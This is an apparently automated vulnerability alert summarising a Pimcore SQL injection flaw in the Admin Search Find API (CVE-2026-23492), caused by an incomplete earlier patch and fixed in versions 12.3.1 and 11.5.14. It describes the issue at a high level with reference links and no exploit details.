Pimcore is an Open Source Data & Experience Management Platform. Prior to 12.3.1 and 11.5.14, an incomplete SQL injection patch in the Admin Search Find API all…
Published:
13 January 2026 at 23:00:00
Alert date:
14 January 2026 at 20:01:57
Source:
nvd.nist.gov
Web Technologies, Database & Storage, Enterprise Applications
Pimcore, an Open Source Data & Experience Management Platform, contains a SQL injection vulnerability in the Admin Search Find API that affects versions prior to 12.3.1 and 11.5.14. The vulnerability stems from an incomplete patch for CVE-2023-30848, which attempted to mitigate SQL injection by removing SQL comments and catching syntax errors but was insufficient. Authenticated attackers can exploit this flaw to perform blind SQL injection attacks without relying on comments, potentially leading to database information disclosure through the admin interface. The vulnerability has been fixed in versions 12.3.1 and 11.5.14.
Technical details
Mitigation steps:
Affected products:
Pimcore
Related links:
https://nvd.nist.gov/vuln/detail/CVE-2026-23492
https://github.com/pimcore/pimcore/commit/25ad8674886f2b938243cbe13e33e204a2e35cc3
https://github.com/pimcore/pimcore/security/advisories/GHSA-qvr7-7g55-69xj
Related CVE's:
Related threat actors:
IOC's:
This article was created with the assistance of AI technology by Perceptive.